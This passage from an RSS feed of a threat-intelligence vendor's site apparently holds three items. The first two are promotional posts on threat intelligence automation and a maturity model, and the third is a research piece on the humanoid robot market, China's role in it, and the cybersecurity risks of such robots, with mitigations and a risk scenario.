        <p>Through automation, organizations can make security decisions at a speed and scale that human teams alone cannot match. Threats are identified, contextualized, and even countered in real time. This machine-speed detection and response means attacks can be thwarted before they escalate into major incidents, compressing the threat response timeline from what might be hours or days down to minutes.</p>
        <h3>Better Resource Allocation</h3>
        <p>When you automate data gathering and initial threat analysis, skilled personnel are freed up to focus on what they do best: in-depth investigations, incident response, threat hunting, and security strategy. This not only improves job satisfaction but also means your team’s expertise is directed at tasks that truly require human judgement. This often leads to cost savings or the ability to handle more threats with the same headcount.</p>
        <h3>Continuous Monitoring With Global Visibility</h3>
        <p>Recorded Future provides continuous, 24/7 monitoring of threats worldwide. It’s like having an around-the-clock sentry that never takes a break. Organizations gain insight into emerging threats and external risks relevant to them, no matter where those threats originate. If a threat actor in another part of the world starts planning attacks against your industry, Recorded Future’s platform may pick up on early warning signs and automatically alert you. This means you’re not only monitoring your internal environment but also the external horizon for incoming risks, all through an automated system.</p>
        <h3>Reduced time to detect and respond</h3>
        <p>Ultimately, adopting an automated threat intelligence solution like Recorded Future dramatically reduces the Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR) for security incidents. Automated response or enrichment means incidents can be contained or remediated far faster. A faster detection/response cycle directly correlates with minimizing damage—the quicker you intercept an attack, the less harm it can do. If you can cut your detection time from the <a href="https://www.ibm.com/reports/data-breach">industry average</a> of ~200 days down to near real-time, you potentially save millions in breach costs.</p>
        <h3>Strengthened security posture</h3>
        <p>By integrating real-time insights and automated actions into daily operations, organizations can close security gaps and achieve a more consistent defense posture. Automation ensures that no critical threat intelligence is missed or ignored, and that defenses are applied uniformly across the board. Moreover, automation enforces best practices automatically, ensuring processes are followed correctly every time. All of this leads to a significant uplift in an organization’s ability to prevent breaches and handle incidents effectively.</p>
        <h2>Practical Applications and Use Cases</h2>
        <h3>Automated IOC Detection</h3>
        <p>Modern threat intelligence platforms can automatically detect and surface indicators of compromise that matter to your organization. Rather than relying on an analyst to manually find a malicious IP or file hash buried in feeds, automation pulls these out in real time. If chatter about a new malware hash or command-and-control server related to your industry appears on a dark web forum, for example, the system will immediately flag it, ensuring you learn of emerging threats the moment they arise.</p>
        <h3>Threat Hunting with Automated Enrichment</h3>
        <p>Threat hunters and researchers greatly benefit from automation when investigating suspicious events. Suppose an analyst is digging into an odd network beacon that might indicate a hidden attacker. With automated enrichment tools, they can get additional context in seconds, such as domain reputation, related threats, or historical occurrences of that indicator. The analyst enters the indicator and the platform aggregates intelligence from open source feeds, commercial intel, and internal data. This on-demand enrichment provides deeper insights instantly, improving both the speed and accuracy of threat hunts.</p>
        <h3>Proactive Defense Through Vulnerability Intelligence</h3>
        <p>Rather than playing catch-up after hackers exploit a vulnerability, organizations can use threat intelligence automation to stay ahead of exploits. Automated systems continuously track CVEs, exploit releases, and even discussions on hacking forums about particular software weaknesses. When something relevant to your tech stack pops up, the system will alert you and provide threat context (e.g., known exploits or ransomware leveraging that CVE). This proactive vulnerability intelligence means you can patch or implement mitigations before an attack hits.</p>
        <p>There are a range of ways in which <a href="https://www.recordedfuture.com/case-studies">different sectors</a> leverage threat intelligence <a href="https://go.recordedfuture.com/automation-ebook">automation</a> in ways tailored to their unique challenges:</p>
        <h3>Financial Services</h3>
        <p><a href="https://www.recordedfuture.com/industry/financial">Banks and financial institutions</a> face constant phishing, fraud, and account takeover attempts. Threat intelligence automation helps instantly flag things like fraudulent banking websites impersonating the institution, or dumps of customer credentials on the dark web. If a fake banking login page is spun up to phish customers, an automated system can detect that site and raise an alert before any customers fall victim. Similarly, automation assists in fraud detection by correlating internal transaction anomalies with known threat patterns in real time. If a series of suspicious money transfers aligns with a known fraud tactic described in threat intel reports, the system can bring it to analysts’ attention immediately.</p>
        <h3>Government</h3>
        <p><a href="https://www.recordedfuture.com/industry/public-sector">Government agencies</a> and defense organizations are high-value targets for state-sponsored cyber attacks. Threat intelligence automation gives these SOCs an upper hand by continuously scanning for indicators of nation-state campaigns targeting them. For instance, an automated platform might monitor for malware signatures, spear-phishing themes, or infrastructure known to be used by groups hostile to a particular country. The moment something matching those patterns is found, the system immediately alerts the security team. This real-time awareness is critical for government SOCs to mobilize defenses against advanced threats.</p>
        <h3>Healthcare</h3>
        <p><a href="https://www.recordedfuture.com/industry/healthcare">Hospitals and healthcare providers</a> are frequently targeted by ransomware, data theft, and other cyberattacks that can literally put lives at risk. Automated threat intelligence in healthcare monitors for signs of impending attacks and provides early warnings. If an underground forum post indicates interest in exploiting a particular healthcare software, the security team can be alerted to fortify that system preemptively. This sector also benefits from automation in disrupting criminal activities: for example, automated systems can detect illicit online marketplaces selling stolen patient data or fake pharmaceutical websites that could harm public trust.</p>
        <h2>Future of Threat Intelligence Automation</h2>
        <p>As cyber threats evolve, automated defense systems will evolve alongside them, becoming self-learning. In the near future, these systems could autonomously adjust detection thresholds or even launch countermeasures based on learned experience, further reducing the need for human tuning. Recorded Future is at the forefront of this trend, embedding advanced AI into its Intelligence Cloud for capabilities like predictive risk scoring, anomaly detection at scale, and automated decision support. The vision is that intelligence automation becomes an indispensable co-pilot for every security team, helping humans make better decisions faster.</p>
        <p>However, it’s important to note that attackers are also embracing AI to automate and enhance their attacks. In response, <a href="https://www.recordedfuture.com/blog/state-of-ai-and-automation-in-threat-intelligence">defensive AI systems</a> are being developed to spot AI-generated threats and respond at machine speed. In this escalating battle, organizations that invest early in threat intelligence automation and AI will possess the agile, self-updating defenses needed to counter AI-augmented cyber attacks.</p>
        <h2>Start Protecting Your Business With Threat Intelligence Automation Today</h2>
        <p>Cyber attacks are accelerating and evolving on a daily basis. This reality makes traditional, purely manual security operations untenable. The longer it takes to detect and respond to threats, the greater the potential damage. By automating intelligence collection and response, organizations drastically improve their chances of stopping breaches in time.</p>
        <p>Recorded Future’s Intelligence Cloud offers an unparalleled combination of real-time breadth , analytical depth, and seamless actionability.</p>
        <p><strong>Ready to accelerate your security operations with threat intelligence automation?</strong> Reach out for a <a href="https://www.recordedfuture.com/get-started">demo or trial</a> to experience how real-time threat intelligence automation can make all the difference in protecting your business.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_10fad5051847a2e2fec903fc5387af7690cc597ae.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Future of Humanoid Robotics]]></title>
            <link>https://www.recordedfuture.com/research/future-humanoid-robotics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/future-humanoid-robotics</guid>
            <pubDate>Thu, 20 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Humanoid robots are arriving faster than anyone expected. Discover the hidden risks, global power shifts, and breakthroughs shaping the future — before your competitors do.]]></description>
            <content:encoded><![CDATA[
        <h2>Summary</h2>
        <p>Advances in <strong>large-language models (LLMs) and the anticipated arrival of artificial general intelligence (AGI) are rapidly closing the gap between concept and capability</strong>. The prospect of humanoid robots functioning autonomously in workplaces and public spaces is moving from speculative to attainable.</p>
        <p>Global <strong>population decline is accelerating the demand for humanoid robots</strong> designed to operate within human environments and offset growing labor shortages across industries.</p>
        <p>A growing number of companies are developing humanoid robots for roles in manufacturing, customer service, and even athletic competition. Investors are positioning for long-term growth, with research suggesting that by <strong>2060, more than three billion humanoid robots could be integrated into human society.</strong></p>
        <p><strong>China appears poised to lead the field of humanoid robotics</strong>. Facing a steep population decline, its strategic emphasis on automation and robotics is becoming central to sustaining economic output and competitiveness.</p>
        <p>Humanoid robots will almost certainly be <strong>vulnerable to cyberattacks</strong>, ranging from hijacking and data leaks to the formation of botnets. This highlights the urgent need to treat humanoid robots with the same rigorous cybersecurity standards as any connected system.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11343f5637b04703c291220dba0dc5cbf41224450.png?width=750&amp;format=png&amp;optimize=medium" width="1178" height="682" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Summary of the conditions that could create a huge demand for humanoid robots in the coming years (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <p><a href="https://www.nvidia.com/en-gb/glossary/humanoid-robot/">Humanoid robots</a> are general-purpose, bipedal robots modeled after the human form and designed to work alongside humans. They are currently being designed to work in factories, serve us, and look after us.</p>
        <p>Understanding the increased <a href="https://www.telegraph.co.uk/business/2025/10/25/robots-save-britains-economy-ageing-population/">attention</a> being given to humanoid robotics begins with recognizing a primary driver: a global labor shortage caused by population decline. Modern economies rely on sustained consumption and productivity growth, both of which are underpinned by expanding populations. Yet, across much of the developed world, and increasingly in emerging markets, this two-century trend of population growth is <a href="https://www.ft.com/content/2d37dc16-5c73-4f2a-92a5-a78326f9dc3d">reversing</a>. The global workforce is shrinking, and the implications for economic output are profound. As traditional labor pools <a href="https://www.mckinsey.com/mgi/our-research/dependency-and-depopulation-confronting-the-consequences-of-a-new-demographic-reality">contract</a>, humanoid robots represent a potential solution, a means of sustaining productivity and economic stability in the face of structural demographic change.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dc2c1e3a9c483de4b7b76bf2bdbb4d564b9bd697.png?width=750&amp;format=png&amp;optimize=medium" width="1244" height="1412" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Forecasts indicate a global population decline, with developed economies projected to experience the most significant impact first (Source:</em> <em><a href="https://www.economist.com/interactive/briefing/2025/09/11/humanity-will-shrink-far-sooner-than-you-think">The Economist</a>)</em></div>
          </div>
        </div>
        <p>Robots working in this capacity are not a new concept. For decades, specialized <a href="https://www.autodesk.com/design-make/articles/history-of-industrial-robots">industrial robots</a> have revolutionized manufacturing by enhancing productivity and mitigating labor shortages, particularly in aging societies such as Japan and South Korea. However, as global demographics shift and labor shortages accelerate, repetitive automation alone will not sustain economic growth. The next phase of robotics will require systems capable of operating seamlessly in environments designed for humans, robots with human-like forms, and, increasingly, human-like cognition.</p>
        <p>Advances in LLMs have accelerated progress toward AGI, making human-like cognition in robots a plausible near-term <a href="https://www.digitimes.com/reports/ai/2025_robots/assets/humanoid-robotics-2025.pdf">reality</a>. Combined with breakthroughs in robotics engineering and declining production costs, these developments position humanoid robots to extend far beyond industrial applications. They are <a href="https://www.bloomberg.com/opinion/articles/2025-09-29/the-us-needs-to-control-its-own-humanoid-robot-future">poised</a> to enter service sectors, healthcare, defense, and domestic care, therefore addressing critical workforce shortages <a href="https://www.bbc.co.uk/news/articles/c9wdzyyglq5o">driven</a> by aging populations.</p>
        <p>The commercial potential of the humanoid robot market is <a href="https://www.morganstanley.com/insights/articles/humanoid-robot-market-5-trillion-by-2050">significant</a>. Recognizing this, both startups and established corporations are making substantial <a href="https://globalventuring.com/corporate/industrial/corporate-investors-humanoid-robots/">investments</a> in humanoid robotics. Leading artificial intelligence (AI) companies are <a href="https://www.iotworldtoday.com/robotics/microsoft-open-ai-to-invest-500m-in-humanoid-robot-startup">investing</a> in humanoid robotics to develop platforms that integrate their cognitive technologies into mobile, human-like forms. At the same time, automotive manufacturers with decades of experience in using robotics and specializing in mass production are <a href="https://www.iotworldtoday.com/robotics/hyundai-to-buy-thousands-of-boston-dynamics-robots-to-advance-manufacturing">investing</a> in the humanoid robotics market and adapting their capabilities to <a href="https://www.independent.co.uk/tech/elon-musk-tesla-optimus-robots-b2819277.html">mass-produce</a> humanoid robots, viewing it as a natural evolution. Today, humanoid robots are deployed in industrial environments and showcased in global sporting events such as the inaugural 2025 <a href="https://www.cnn.com/2025/08/16/sport/world-humanoid-robot-olympics-china-intl">Robot Olympics</a> in Beijing.<br />While the production and manufacturing of humanoid robots is complicated and expensive, with each passing year, the cost of producing them is <a href="https://www.mitsui.com/mgssi/en/report/detail/__icsFiles/afieldfile/2025/03/27/2501btf_tsuji_matsuura_e.pdf">decreasing</a>. Globally, analysts <a href="https://www.outlookbusiness.com/start-up/deeptech/humanoid-robots-could-cost-just-13000-by-2035-heres-what-that-means-for-global-ai-race?utm_source=chatgpt.com">expect</a> the average bill-of-materials (BOM) cost per humanoid robot to decrease to USD 13,000–17,000 by the early 2030s, thereby reducing the average purchasing cost per robot.</p>
        <p>China, in particular, is <a href="https://www.goldmansachs.com/static-libs/pdf-redirect/prod/index.html?path=/pdfs/insights/pages/gs-research/global-automation-humanoid-robot-the-ai-accelerant/report.pdf&amp;originalQuery=&amp;referrer=https://www.google.com/">leading</a> the way. Some of its humanoid robots, such as Unitree’s R1 robot, can already be <a href="https://www.reuters.com/technology/chinas-unitree-prices-new-humanoid-robot-deep-discount-2024-model-2025-07-25/?utm_source=chatgpt.com">purchased</a> for around USD 5,500.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fa96336ae238d88e9f0a43c90b0ed801560f932c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="817" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Projected cost reductions associated with large-scale production increases (Source:</em> <em><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Bank of America Institute “Humanoid Robots 101”</a>)</em></div>
          </div>
        </div>
        <p>Furthermore, unlike other countries that have attempted to offset labor shortages through immigration, China’s policy has been more focused on finding a <a href="https://www.ispionline.it/en/publication/why-isnt-china-considering-immigration-against-demographic-decline-163101">technological solution</a> rather than importing labor. China’s long-term planning and economic strategy appear to be increasingly <a href="https://foreignpolicy.com/2025/10/14/china-peoples-daily-editorials-zhong-caiwen/?tpcc=editors_picks&amp;utm_source=Sailthru&amp;utm_medium=email&amp;utm_campaign=Editors%20Picks%20-%2010142025&amp;utm_term=editors_picks">focused</a> on robotics, and it has spent the last decade <a href="https://www.telegraph.co.uk/business/2025/10/12/why-western-executives-visit-china-coming-back-terrified/">preparing</a> its industrial base to mass-produce robots. It comes as no surprise that Recorded Future’s <a href="https://assets.recordedfuture.com/Datasheets/Datasheet-Network-Intelligence.pdf">Network Intelligence</a> continues to reveal state–linked malware families targeting the robotics industry, likely seeking to acquire sensitive intellectual property.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15fbe77c33881ea8863b8ee9cc2eda36a8fb7ed71.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="766" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Malware families targeting robotics industries (Source:</em> <em><a href="https://app.recordedfuture.com/live/?sc=aLhYPi9JcFSo&amp;_sc_tail=o">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Some speculative <a href="https://www.morganstanley.com/insights/articles/humanoid-robot-market-5-trillion-by-2050">forecasts</a> suggest that China could eventually field approximately 300,000,000 humanoid robots to compensate for its demographic decline, as its population is predicted to shrink significantly over the coming decades. Having dominated the production of electric vehicles, China and its leadership are now <a href="https://www.economist.com/china/2025/10/09/xi-jinping-is-personally-involved-in-chinas-new-five-year-plan">aiming</a> to dominate the humanoid robotics sector as well. These robots might also be exported to other countries facing demographic stress, potentially generating massive revenue for China.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13b5e3f99a420a71529b995e81087ffa8e0e92fdc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="508" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>China leading with patent filings mentioning humanoid robots 2020-25 (left) (Source:</em> <em><a href="https://advisor.morganstanley.com/john.howard/documents/field/j/jo/john-howard/The_Humanoid_100_-_Mapping_the_Humanoid_Robot_Value_Chain.pdf">Morgan Stanley, “The Humanoid 100”</a>); graph showing the organisations that are filing for humanoid technological development (right) (Source:</em> <em><a href="https://www.mitsui.com/mgssi/en/report/detail/__icsFiles/afieldfile/2025/03/27/2501btf_tsuji_matsuura_e.pdf">MITSUI &amp; CO. “Humanoid Robots”</a>)</em></div>
          </div>
        </div>
        <p>By comparison, there are <a href="https://www.lemonde.fr/en/economy/article/2025/08/16/china-s-robotics-industry-surges-amid-promise-of-a-5-trillion-market_6744434_19.html?utm_source=chatgpt.com">predictions</a> that the US might reach approximately 77,000,000 humanoid robots within a similar timeframe, coinciding with projected population decline in the US. However, these numbers remain highly speculative and should be treated as illustrative rather than definitive forecasts.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_123fa87fa5943d7999e144e538c07ed5f658f522b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1214" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Selected</em> <em><a href="https://www.voronoiapp.com/technology/The-Current-Generation-of-Humanoid-Robots-2025-4656">examples</a></em> <em>of notable humanoid robots currently under development; the list of humanoid robots represented in this image is not exhaustive (Source: Voronoi)</em></div>
          </div>
        </div>
        <p>The world appears to be moving steadily toward the age of humanoid robots. By 2060, <a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">studies</a> project that up to three billion of these machines could coexist with humans, most of them serving in household and personal-assistant capacities. While this might seem speculative, the recent rapid progress made in artificial intelligence and electric vehicles suggests that it is a serious possibility.</p>
        <p>The path forward, however, is not without obstacles. The <a href="https://research.mobiusriskgroup.com/p/the-energy-diet-of-humanoid-robots">energy demands</a> of humanoid robots could pose a significant question, and producing millions of units would require <a href="https://www.marketindex.com.au/news/rise-of-the-machines-how-1-billion-humanoid-robots-by-2050-will-drive-a">mining</a> massive quantities of critical materials. Consequently, there is <a href="https://techcrunch.com/2025/09/26/famed-roboticist-says-humanoid-robot-bubble-is-doomed-to-burst/">skepticism</a> that the humanoid robot market will expand as rapidly as forecasts suggest. Some view current enthusiasm as part of the emerging technology hype cycle, <a href="https://rodneybrooks.com/why-todays-humanoids-wont-learn-dexterity/">warning</a> that a correction, or “hype crash,” is likely.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1850ff9130fc009c9405257e53560df078d6b7510.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Projected global ownership of humanoid robots, potentially reaching billions by 2060 (Source:</em> <em><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Bank of America Institute “Humanoid Robots 101”</a>)</em></div>
          </div>
        </div>
        <p>We should also take the cybersecurity risks posed to humanoid robots seriously. For example, researchers recently <a href="https://github.com/Bin4ry/UniPwn">discovered</a> a critical flaw in Unitree Robotics’ Bluetooth protocol that could let attackers wirelessly hijack its humanoid robots — machines already in use across labs, universities, and law enforcement agencies. In another instance, researchers found leaked, hard-coded encryption keys that allow one compromised robot to infect others nearby, forming botnets with root-level control. One model also <a href="https://techxplore.com/news/2025-09-g1-humanoid-robots-secretly-china.html">transmitted</a> data to servers in China without user consent. This followed a viral <a href="https://www.vice.com/en/article/humanoid-robot-turned-on-handlers-at-factory-in-dystopian-attack/">incident</a> in May 2025, in which a humanoid robot turned on its human handlers.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_17f43a7e43b8a3935ffc54de121657ac7cc8c41a5.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1154" height="508" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 8:</strong></em> <em>Statement from Unitree Robotics regarding the security vulnerabilities in their robots in October 2025 (Source:</em> <em><a href="https://www.linkedin.com/posts/unitreerobotics_statement-to-our-respected-unitree-users-activity-7378441101927436288-lLdA?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABJFSTMBitTVESuT6vGntc-sNUQj9qBY9Q4">Unitree Robotics LinkedIn Post</a>)</em></div>
          </div>
        </div>
        <p>These security flaws, whether due to negligence or intent, create opportunities for serious cyber threats. Humanoid robots are often <a href="https://interestingengineering.com/innovation/security-flaw-unitree-humanoids-china">network-connected</a> systems that must meet the same security standards as any other digital asset.</p>
        <h2>Outlook</h2>
        <p><strong>China is likely to lead in the development and export of humanoid robots.</strong> It has already invested heavily in research and development and faces mounting pressure to deploy robots to mitigate severe labor shortages. Thus, China is likely to produce more cost-effective options than other countries, such as the United States, which will likely produce more advanced but more expensive models. Much like China’s lower-priced electric vehicles that are now dominating global markets, its humanoid robots may follow a similar trajectory, expanding rapidly into developing economies.<br /><br /><strong>Car manufacturers will likely increasingly enter the humanoid robot industry.</strong> This shift is partly an effort to offset declining car sales driven by population decline, but primarily because these companies already deploy robots at scale and possess the expertise to mass-produce complex machinery on assembly lines.</p>
        <p><strong>Cyber-espionage activity targeting companies in the robotics sector will almost certainly accelerate.</strong> State-sponsored cyber threat actors are already actively targeting the electronics and advanced manufacturing industries to obtain intellectual property that enhances domestic production. As the robotics industry becomes increasingly prevalent, the risk of cyberattacks against companies and their supply chains is expected to grow.</p>
        <p><strong>A new industry designed to secure humanoid robots is likely to emerge in the next decade.</strong> Securing humanoid robots will become an essential function, leading to the rise of dedicated security sectors, much like those that developed to protect computers in the past.</p>
        <p><strong>Geopolitical tensions are likely to intensify as nations compete to secure the resources necessary for the development of humanoid robots.</strong> Demand for rare earth elements, semiconductors, and other key components will heighten competition for mines and production facilities. Organizations involved in this supply chain will also need robust cybersecurity measures to protect against espionage and destructive cyberattacks targeting robotic systems.</p>
        <h2>Mitigations</h2>
        <p><strong>Track global humanoid robotics developments.</strong> Monitor government and corporate investments, export strategies, and regulations shaping the humanoid robotics industry. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to monitor policy shifts and strategic industrial activity.<br /><br /><strong>Prepare for advanced robotics integration.</strong> Assess how humanoid and adaptive robotics fit within manufacturing, logistics, and defense operations, including their impacts on the workforce and safety. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> to identify risks as robotics integrates into operations.</p>
        <p><strong>Strengthen robotics and Internet-of-Things (IoT) security.</strong> Expand IoT security to cover robotic hardware, firmware, and AI systems. Segment networks and continuously monitor for anomalies. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> for alerts on exploits and threat actor activity targeting robotics.</p>
        <p><strong>Monitor criminal and dark web activity.</strong> Track chatter and listings on criminal forums related to robotics or IoT exploitation to identify early threats or potential attack planning. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> module to monitor for dark web and closed-source monitoring tied to robotics targeting.</p>
        <p><strong>Anticipate geopolitical supply chain risks</strong>. Watch for disruptions or state competition over rare earths, semiconductors, and energy that could impact robotics production. Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to gain visibility into geopolitical risks.</p>
        <h2>Risk Scenario</h2>
        <p><strong>Scenario:</strong> Your company supplies critical components to a firm developing advanced humanoid robots. Meanwhile, a nation pursuing similar ambitions in robotics seeks to acquire your intellectual property to accelerate its own program.</p>
        <h3>First-Order Implications</h3>
        <h4>Threat</h4>
        <p>State-backed hackers compromise engineering systems through supplier access points and credential theft. An insider also provides unauthorized access to proprietary robotics designs and control algorithms.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> Disruption to research and development (R&amp;D) and production as systems are secured and code repositories quarantined</li>
          <li><strong>Legal:</strong> Possible breach of export-control and defense technology regulations</li>
          <li><strong>Brand:</strong> Damage to reputation as a trusted supplier of advanced technology</li>
          <li><strong>Competitive:</strong> Early exposure of design concepts erodes secrecy around next-generation capabilities</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <h4>Threats</h4>
        <p>Stolen designs enable the foreign nation to fast-track its robotics program, eroding your client’s competitive advantage. Compromised components create a backdoor risk for your client’s production environment.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> Heightened security reviews delay contracts and certifications</li>
          <li><strong>Financial:</strong> Loss of key clients and potential cancellation of high-value agreements</li>
          <li><strong>Legal:</strong> Cross-border investigations into data handling and export compliance</li>
          <li><strong>Competitive:</strong> Diminished differentiation as adversaries replicate your technology and erode market leadership</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <h4>Threats</h4>
        <p>The foreign nation deploys robotics derived from stolen intellectual property in global markets and military applications. Governments tighten export rules and exclude compromised firms from critical programs.</p>
        <h4>Organizational Risk</h4>
        <ul>
          <li><strong>Operational:</strong> A need for a major redesign of the security architecture and requalification in trusted networks necessitates operations to be stalled</li>
          <li><strong>Financial:</strong> Long-term decline in market access and investor confidence</li>
          <li><strong>Legal:</strong> Ongoing regulatory oversight and potential sanctions due to past compromise</li>
          <li><strong>Brand:</strong> Lasting perception as a high-risk or compromised supplier</li>
          <li><strong>Competitive:</strong> Permanent loss of innovation lead and diminished influence over future robotics standards</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://advisor.morganstanley.com/john.howard/documents/field/j/jo/john-howard/The_Humanoid_100_-_Mapping_the_Humanoid_Robot_Value_Chain.pdf">The Humanoid 100: Mapping the Humanoid Robot Value Chain</a></li>
          <li><a href="https://institute.bankofamerica.com/content/dam/transformation/humanoid-robots.pdf">Humanoid Robots 101</a></li>
          <li><a href="https://www.recordedfuture.com/research/rednovember-targets-government-defense-and-technology-organizations">RedNovember Targets Government, Defense, and Technology Organizations</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1b8fde5342bd90e746bffe0ee7e55379fbbff17ca.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Operational Cyber Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/operational-cyber-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/operational-cyber-threat-intelligence</guid>
            <pubDate>Wed, 19 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Move beyond noise. Learn how to build effective threat intelligence operations that turn raw data into actionable insights and proactive cyber defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>The average organization today relies on multiple platforms and tools delivering round-the-clock feeds of security information and alerts. Under this deluge of data, many organizations find themselves struggling to actually make sense of, let alone use of, all this information.</li>
          <li>Recorded Future offers a concrete threat intelligence maturity journey organizations can follow in order to evolve from this reactive state of intelligence overload, to a more value-added state. The four stages of this journey include: Reactive, Proactive, Predictive, and Autonomous.</li>
          <li>Along the course of this journey, organizations will take clear steps to go from responding to threats after detection, to preventing known threats, all the way to using automation to self-direct threat responses with minimal human intervention</li>
          <li>Platforms like Recorded Future provide the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.</li>
        </ul>
        <h2>The Information Overload Problem: Why More isn’t Always Better</h2>
        <p>Your security operations center (SOC) runs multiple <a href="https://www.recordedfuture.com/threat-intelligence">threat intelligence</a> feeds around the clock. Hundreds of alerts pour in daily—indicators of compromise (IOCs), suspicious IP addresses, emerging vulnerabilities, and more. Yet despite all this data, the team still spends much of its day reacting to alerts, rather than staying ahead of threats. Valuable data is stored, analyzed, and even given high visibility, but rarely acted upon in time to make a difference.</p>
        <p>This is the information overload problem, and it’s widening the gap between information and action. Organizations collect and subscribe to vast quantities of threat data from multiple sources, but few have the threat intelligence capabilities—the processes, integrations, and automation—required to add context to all that data and transform it into measurable security outcomes.</p>
        <p>The problem isn’t the data itself. It’s the operationalization of it. That is to say, the ability to use threat data efficiently, contextually, and predictively across the security ecosystem. As Recorded Future highlights in its <em><a href="https://www.recordedfuture.com/resources/maturity-assessment#:~:text=Our%20free%20interactive%20assessment%20evaluates%20your%20capabilities%2C%20reveals,biggest%20ROI%20opportunities%2C%20quick%20wins%2C%20and%20tailored%20recommendations.">Threat Intelligence Maturity Assessment</a></em>, most organizations are somewhere along a journey toward maturity, moving from purely reactive intelligence to fully autonomous operations.</p>
        <p>This post explores that path, offering a practical roadmap for transforming raw alerts into <a href="https://www.recordedfuture.com/blog/operational-threat-intelligence">operational cyber threat intelligence</a>. Using the four stages of maturity (i.e. Reactive, Proactive, Predictive, and Autonomous) we’ll show how organizations can evolve their security programs from putting out fires to acting with foresight.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1f6ac9cee9a486fb9ce3a44eb5022a60f1b6814ba.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="600" />
            </div>
          </div>
          <div>
            <div><em>Stages of Recorded Future’s Threat Intelligence Maturity Model</em></div>
          </div>
        </div>
        <h2>The Threat Intelligence Maturity Model: From Reactive to Autonomous</h2>
        <p>Threat intelligence isn’t a binary capability. It exists on a continuum. As organizations gain visibility, automation, and analytical depth, their approach to threat intelligence evolves. Recorded Future’s <em><a href="https://www.recordedfuture.com/resources/maturity-assessment">Threat Intelligence Maturity Model</a></em> defines this journey in four stages:</p>
        <ol>
          <li><strong>Reactive</strong>: Responding to threats after detection.</li>
          <li><strong>Proactive</strong>: Preventing known threats before impact.</li>
          <li><strong>Predictive</strong>: Anticipating threats before they materialize.</li>
          <li><strong>Autonomous</strong>: Enabling self-directing, intelligence-led defense at machine speed.</li>
        </ol>
        <p>Each stage represents a significant leap in capability, mindset, and operational efficiency. Progress along this path requires more than just technology. It depends equally on people, processes, and the integration of intelligence into everyday decision-making.</p>
        <p>In the sections that follow, we’ll explore what defines each stage, common challenges, measurable KPIs, and key actions to help organizations advance their threat intelligence operations.</p>
        <h3>Stage 1: Reactive—Responding to What’s Already Happened</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c193da9e8d214f4a7e3c8f9d9eeb9360d05300c3.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
